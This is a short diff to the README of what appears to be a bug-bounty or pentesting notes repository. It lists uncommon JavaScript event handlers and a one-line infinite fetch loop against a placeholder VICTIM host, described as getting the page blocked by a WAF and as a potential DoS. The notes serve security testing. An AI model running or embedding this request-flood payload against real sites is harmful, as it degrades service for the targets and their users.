seeu-inspace/easyg/README.md

 - Unusual events
   - `onpointerrawupdate` (Chrome only)
   - `onmouseleave`
-- This could lead the page to make infinitely requests eventually causing being blocked by a WAF and being a potential DoS
+- This lead the page to make a loop of requests, eventually causing being blocked by a WAF and being a potential DoS
   ```JavaScript
   for(;;){fetch('https://VICTIM/',{method:'GET'});}
   ```